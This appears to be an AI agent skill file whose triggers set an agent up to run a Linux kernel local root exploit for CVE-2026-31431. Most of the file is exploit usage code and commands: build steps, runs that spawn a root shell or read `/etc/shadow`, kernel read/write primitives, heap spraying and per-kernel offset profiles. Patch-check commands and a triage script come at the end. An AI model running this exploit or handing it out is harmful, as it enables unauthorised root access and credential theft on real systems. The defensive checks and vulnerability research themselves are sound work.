---
name: copy-fail-cve-2026-31431
description: Linux kernel local privilege escalation exploit (CVE-2026-31431) discovered by Theori's Xint Code, targeting a 9-year-old vulnerability in the Linux copy subsystem
triggers:
- exploit CVE-2026-31431
- copy fail linux privilege escalation
- linux kernel LPE exploit
- run copy fail exploit
- privilege escalation linux kernel 2026
- theori xint code exploit
- CVE-2026-31431 poc
- linux kernel local root exploit
---
# Copy Fail - CVE-2026-31431
> Skill by [ara.so](https://ara.so) — Daily 2026 Skills collection.
## Overview
**Copy Fail** (CVE-2026-31431) is a local privilege escalation (LPE) vulnerability in the Linux kernel discovered by Theori's Xint Code. The bug has existed for approximately 9 years and affects a wide range of Linux distributions. This repository contains a proof-of-concept exploit written in Python, along with supporting tooling for research and testing purposes.
> ⚠️ **Legal Notice**: This exploit is for **authorized security research, penetration testing, and educational purposes only**. Use only on systems you own or have explicit written permission to test.
**Affected Kernels / Distros:**
| Distro | Version |
|-------------------|----------------------------|
| Ubuntu 24.04 LTS | 6.17.0-1007-aws |
| Amazon Linux 2023 | 6.18.8-9.213.amzn2023 |
| RHEL 10.1 | 6.12.0-124.45.1.el10_1 |
| SUSE 16 | 6.12.0-160000.9-default |
- **Technical writeup**: https://xint.io/blog/copy-fail-linux-distributions
- **CVE**: CVE-2026-31431
- **Language**: Python
- **Stars**: 3151+
---
## Installation
### Prerequisites
- Python 3.10+
- Linux system (see supported distros above)
- gcc / build-essential (for any compiled helper components)
- Root-accessible test environment (VM recommended)
### Clone and Set Up
```bash
git clone https://github.com/theori-io/copy-fail-CVE-2026-31431.git
cd copy-fail-CVE-2026-31431
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install Python dependencies
pip install -r requirements.txt
```

```bash
make
# or
gcc -o helper helper.c -lpthread
```

```text
copy-fail-CVE-2026-31431/
├── exploit.py # Main exploit entry point
├── exploit/
│ ├── __init__.py
│ ├── core.py # Core exploit logic
│ ├── primitives.py # Kernel read/write primitives
│ ├── spray.py # Heap spray utilities
│ └── utils.py # Helper utilities
├── helper.c # Native C helper (compiled separately)
├── requirements.txt
├── Makefile
└── README.md
```

```bash
# Basic run — attempt privilege escalation to root
python3 exploit.py
# Verbose output for debugging
python3 exploit.py --verbose
# Specify a shell to spawn after root is obtained
python3 exploit.py --shell /bin/bash
# Specify a command to run as root
python3 exploit.py --exec "id && cat /etc/shadow"
# Target a specific kernel offset profile
python3 exploit.py --profile ubuntu-24.04-6.17
# List built-in kernel profiles
python3 exploit.py --list-profiles
```

```python
from exploit.core import CopyFailExploit
from exploit.utils import get_kernel_version, is_vulnerable

# Check if the current kernel is vulnerable
kernel = get_kernel_version()
print(f"Kernel: {kernel}")
if is_vulnerable(kernel):
    print("[+] Kernel appears vulnerable to CVE-2026-31431")
else:
    print("[-] Kernel may not be vulnerable or is patched")

# Initialize and run the exploit
exploit = CopyFailExploit(verbose=True)
result = exploit.run()
if result.success:
    print(f"[+] Privilege escalation successful! UID: {result.uid}")
else:
    print(f"[-] Exploit failed: {result.error}")
```

```python
from exploit.primitives import KernelPrimitives

prims = KernelPrimitives()
# Establish arbitrary read/write after initial corruption
prims.setup()
# Read 8 bytes from a kernel address
value = prims.read64(kernel_addr)
print(f"Value at {hex(kernel_addr)}: {hex(value)}")
# Write 8 bytes to a kernel address
prims.write64(target_addr, new_value)
# Read a range of kernel memory
data = prims.read_bytes(kernel_addr, length=256)
print(data.hex())
```

```python
from exploit.spray import HeapSpray

spray = HeapSpray()
# Allocate controlled objects to shape the slab heap
spray.allocate(count=1000, size=256, data=b"\x41" * 256)
# Free every other allocation to create holes
spray.create_holes(step=2)
# Trigger the vulnerable copy path
spray.trigger_copy_fail()
# Check spray success
if spray.check_overlap():
    print("[+] Heap spray successful — objects overlap")
```

```python
from exploit.core import CopyFailExploit, ExploitConfig

config = ExploitConfig(
    verbose=True,
    spray_count=2000,   # Number of spray objects
    retry_limit=5,      # Max retries on partial failure
    shell="/bin/bash",  # Shell to spawn on success
    profile="auto",     # Auto-detect kernel profile
    timeout=30,         # Seconds before giving up
)
exploit = CopyFailExploit(config=config)
exploit.run()
```

Profiles store kernel-specific offsets needed for reliable exploitation.

```python
# profiles/ubuntu_24_04.py (example structure)
PROFILE = {
    "name": "ubuntu-24.04-6.17.0-1007-aws",
    "offsets": {
        "task_struct_cred": 0xA40,
        "cred_uid": 0x04,
        "cred_gid": 0x08,
        "copy_fail_trigger": 0xFFFFFFFF81234567,  # placeholder
    }
}
```

```python
from exploit.profiles import load_profile, detect_profile

# Auto-detect current kernel profile
profile = detect_profile()
print(f"Detected profile: {profile['name']}")
# Manually load a profile
profile = load_profile("ubuntu-24.04-6.17")
```

```python
import subprocess
from exploit.core import CopyFailExploit
from exploit.utils import get_kernel_version, is_vulnerable, dump_system_info

# 1. Gather system information
info = dump_system_info()
print(info)

# 2. Vulnerability check
kernel = get_kernel_version()
if not is_vulnerable(kernel):
    print("System may be patched — check kernel version.")
    exit(1)

# 3. Run exploit with logging
exploit = CopyFailExploit(verbose=True, log_file="/tmp/copyfail.log")
result = exploit.run()

# 4. Post-exploitation (research only)
if result.success:
    subprocess.run(["id"], check=True)
```

```bash
# Override spray count via environment
COPYFAIL_SPRAY_COUNT=3000 python3 exploit.py --verbose
# Set custom profile directory
COPYFAIL_PROFILE_DIR=/opt/profiles python3 exploit.py
# Enable extra kernel debug output
COPYFAIL_DEBUG=1 python3 exploit.py
```

```python
import os
from exploit.core import CopyFailExploit, ExploitConfig

config = ExploitConfig(
    spray_count=int(os.environ.get("COPYFAIL_SPRAY_COUNT", 1000)),
    verbose=bool(os.environ.get("COPYFAIL_DEBUG", False)),
    profile_dir=os.environ.get("COPYFAIL_PROFILE_DIR", "./profiles"),
)
exploit = CopyFailExploit(config=config)
exploit.run()
```

```python
from exploit.utils import check_patch_status

status = check_patch_status()
print(f"Patched: {status.patched}")
print(f"Kernel: {status.kernel_version}")
print(f"Mitigation: {status.mitigation_detail}")
```

```bash
# List available profiles
python3 exploit.py --list-profiles
# Force auto-detection
python3 exploit.py --profile auto
# Manually specify kernel version string
python3 exploit.py --profile-kernel "6.17.0-1007-aws"
```

```python
# Increase spray count and retries
config = ExploitConfig(
    spray_count=5000,
    retry_limit=10,
)
```

```bash
# Run with verbose to observe spray progress
python3 exploit.py --verbose --spray-count 5000
```

```bash
# Some primitives require specific capabilities
# Ensure you're running as unprivileged user (not already root)
whoami
# Check kernel lockdown mode
cat /sys/kernel/security/lockdown
```

```bash
pip install --upgrade -r requirements.txt
# If using system Python
python3 -m pip install --user -r requirements.txt
```

- `--spray-count` to lower heap pressure
- `/var/log/kern.log` or `dmesg` after a failed attempt

```bash
dmesg | tail -50
journalctl -k | tail -50
```

To check if your system is patched:

```bash
# Ubuntu / Debian
apt-get changelog linux-image-$(uname -r) | grep -i CVE-2026-31431
# RHEL / Amazon Linux
rpm -q --changelog kernel | grep -i CVE-2026-31431
# General kernel version check
uname -r
```

Apply kernel updates immediately via your distribution's package manager.
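
The patch checks above can be combined into one triage script for fleet use. This is an added example, not code from the original page or the Theori repository; the function names and status labels are assumptions, and the build list is copied from the table on this page.

```bash
#!/usr/bin/env bash
# Added example: patch triage for CVE-2026-31431 (defensive check only).
CVE_ID="CVE-2026-31431"
# Builds copied from the "Affected Kernels / Distros" table on this page.
LISTED_BUILDS="6.17.0-1007-aws 6.18.8-9.213.amzn2023 6.12.0-124.45.1.el10_1 6.12.0-160000.9-default"

# Succeeds if kernel release $1 starts with a listed build
# (prefix match, because uname -r may append an arch suffix such as .x86_64).
is_listed_build() {
    for b in $LISTED_BUILDS; do
        case "$1" in "$b"*) return 0 ;; esac
    done
    return 1
}

# Succeeds if the changelog text on stdin names the CVE.
changelog_mentions_cve() {
    grep -Fqi -- "$CVE_ID"
}

# Prints the kernel package changelog using the commands shown on this page.
kernel_changelog() {
    if command -v apt-get >/dev/null 2>&1; then
        apt-get changelog "linux-image-$1" 2>/dev/null
    elif command -v rpm >/dev/null 2>&1; then
        rpm -q --changelog kernel 2>/dev/null
    fi
}

# classify RELEASE < changelog-text ; prints one of three status labels.
classify() {
    if changelog_mentions_cve; then
        echo "changelog-names-cve"
    elif is_listed_build "$1"; then
        echo "listed-build-no-fix-seen"
    else
        echo "not-listed-no-fix-seen"
    fi
}

# Run against the live host only when asked: ./check.sh --check
if [ "${1:-}" = "--check" ]; then
    rel="$(uname -r)"
    status="$(kernel_changelog "$rel" | classify "$rel")"
    echo "$rel: $status"
    # The package changelog describes what is installed; the fix is only
    # active once the host has rebooted into the updated kernel.
    [ "$status" = "changelog-names-cve" ] || exit 1
fi
```

The script exits non-zero unless the changelog names the CVE, so it can gate a compliance job; `not-listed-no-fix-seen` means only that the build is absent from this page's table, not that the kernel is unaffected.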